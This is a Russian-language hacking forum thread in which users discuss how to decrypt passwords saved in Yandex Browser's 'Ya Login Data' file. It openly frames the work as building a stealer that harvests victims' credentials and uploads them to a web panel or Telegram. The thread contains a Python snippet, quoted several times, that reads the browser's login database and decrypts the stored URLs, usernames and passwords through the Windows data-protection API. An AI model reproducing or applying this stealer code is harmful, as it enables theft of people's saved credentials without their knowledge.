Как расшифровать?

Girl
Пользователь
Статус
Оффлайн
Регистрация
11 Ноя 2019
Сообщения
248
Реакции[?]
46
Поинты[?]
3K
Как расшифровать пароли от Yandex? Из файла Ya Login Data.
 
Girl
Пользователь
Статус
Оффлайн
Регистрация
11 Ноя 2019
Сообщения
248
Реакции[?]
46
Поинты[?]
3K
Из куков?
Или из Яндекс.Браузера?
Не понял вопроса.
В Ya Login Data хранятся все пароли, которые сохранил пользователь, но браузер их шифрует, мне нужно расшифровать их.
 
Забаненный
Статус
Оффлайн
Регистрация
28 Апр 2019
Сообщения
1,262
Реакции[?]
360
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Не понял вопроса.
В Ya Login Data хранятся все пароли, которые сохранил пользователь, но браузер их шифрует, мне нужно расшифровать их.
Принять ислам. Вроде никак нельзя
 
Dreammmless.
Эксперт
Статус
Оффлайн
Регистрация
19 Мар 2019
Сообщения
2,956
Реакции[?]
962
Поинты[?]
1K
Забаненный
Статус
Оффлайн
Регистрация
24 Фев 2020
Сообщения
8
Реакции[?]
0
Поинты[?]
0
Товары в продаже
1
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Как расшифровать пароли от Yandex? Из файла Ya Login Data.
их можно расшифровать только на пк где их зашифровали.
Соответственно если ты делаешь стиллер то, он должен собирать пароли расшифровывать их, сохранять, и загружать на веб панель либо в тг
 
Пользователь
Статус
Оффлайн
Регистрация
16 Дек 2018
Сообщения
309
Реакции[?]
76
Поинты[?]
0
ну браузер же как то шифрует и расшифровывает = можно расшифровать, только хзкак
Мастер-ключ рандомный и хранится на пк (где не ебу, толи привязан к профилю пользователя windows, толи как-то ещё). В metasploit’e есть модуль для стилла и дешифровки паролей хрома (яндекс = хромиум), но работает он только на пк жертвы.
 
Girl
Пользователь
Статус
Оффлайн
Регистрация
11 Ноя 2019
Сообщения
248
Реакции[?]
46
Поинты[?]
3K
Вроде никак нельзя
Можно все.

расшифровывать их
Я и задал вопрос, как?

толи привязан к профилю пользователя windows
Что бы получить мастер-ключ, надо вроде бы ввести пароль от юзера, так что наверное да.

хрома (яндекс = хромиум)
Яндекс = хромиум, Яндекс != хром.
Расшифровать от хрома я могу, яндекса - нет.

но работает он только на пк жертвы
Это не проблема, вопрос остается таким же.
 
окряен.цц
Уникальная группа
Статус
Оффлайн
Регистрация
12 Окт 2017
Сообщения
406
Реакции[?]
176
Поинты[?]
1K
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
 
Забаненный
Статус
Оффлайн
Регистрация
24 Фев 2020
Сообщения
8
Реакции[?]
0
Поинты[?]
0
Товары в продаже
1
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
кто то ещё пользуется питоном?
 
Girl
Пользователь
Статус
Оффлайн
Регистрация
11 Ноя 2019
Сообщения
248
Реакции[?]
46
Поинты[?]
3K
Не уверен, что это всё ещё работает, но вот тебе PoC на питоне

Python:
datastr = 'Passwords:\n'
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2])[1].decode()
    login = result[1]
    url = result[0]
    if password != '':
        datastr += url + ' | ' + login + ' | ' + password + '\n'
Не работает, или я идиот, который не пишет на python.
1586714714473.png
 
окряен.цц
Уникальная группа
Статус
Оффлайн
Регистрация
12 Окт 2017
Сообщения
406
Реакции[?]
176
Поинты[?]
1K
Сверху Снизу